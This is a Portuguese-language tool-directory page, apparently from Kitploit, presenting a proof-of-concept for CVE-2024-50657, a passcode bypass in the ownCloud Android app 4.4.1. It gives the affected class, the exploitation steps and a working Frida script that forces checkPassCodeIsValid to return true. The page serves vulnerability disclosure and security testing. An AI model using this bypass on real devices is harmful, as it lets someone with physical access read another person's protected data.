Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-50657 — Fornece um exploit de prova de conceito para CVE-2024-50657, uma vulnerabilidade de controle de acesso incorreto no aplicativo Android Owncloud, demonstrando bypass de senha via hooking Frida. | Kitploit
Ferramentas/GitHubGitHub/sahalll/cve-2024-50657
Segurança AndroidAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança Móvel
GitHubsahalll/cve-2024-50657

CVE-2024-50657

Fornece um exploit de prova de conceito para CVE-2024-50657, uma vulnerabilidade de controle de acesso incorreto no aplicativo Android Owncloud, demonstrando bypass de senha via hooking Frida.

Ver Repositório
10há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-50657: Controle de Acesso Incorreto no apk do Owncloud

Um problema no apk Android do Owncloud v.4.4.1 permite que um atacante fisicamente próximo escale privilégios através da classe PassCodeViewModel, especificamente no método checkPassCodeIsValid.

Tipo de Vulnerabilidade

Controle de Acesso Incorreto

Fornecedor do Produto

Owncloud

Base de Código do Produto Afetado

Owncloud android apk - 4.4.1

Componente Afetado

com.owncloud.android.presentation.security.passcode.PassCodeViewModel

Exploração

Identificar a Classe e o Método Alvo:

A classe PassCodeViewModel no aplicativo gerencia a lógica de verificação de senha. O método checkPassCodeIsValid dentro desta classe é responsável por determinar a validade da senha inserida.

Hook no Método Usando Frida:

Um script Frida é usado para fazer hook no método checkPassCodeIsValid da classe PassCodeViewModel. A implementação do método é alterada para sempre retornar true, ignorando a validação real da senha.

Execução:

O script Frida é executado enquanto o aplicativo está em execução. Qualquer senha inserida pelo usuário será aceita como válida, permitindo acesso não autorizado.

PoC

Java.perform(function() { // Locate the PassCodeViewModel class in the target application var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

// Hook the checkPassCodeIsValid method to modify its behavior PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true return true;

};

});

Link do Vídeo POC : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing

Impacto:-

Esta vulnerabilidade é uma vulnerabilidade de bypass de segurança do lado do cliente. Ela afeta os usuários do aplicativo que dependem do recurso de senha para proteger dados sensíveis ou restringir o acesso a certas funcionalidades do aplicativo. Ao explorar essa vulnerabilidade, um atacante pode ignorar a verificação de senha e obter acesso não autorizado a áreas do aplicativo que deveriam ser protegidas, potencialmente expondo dados do usuário ou permitindo ações não autorizadas dentro do aplicativo.

Baixar ferramenta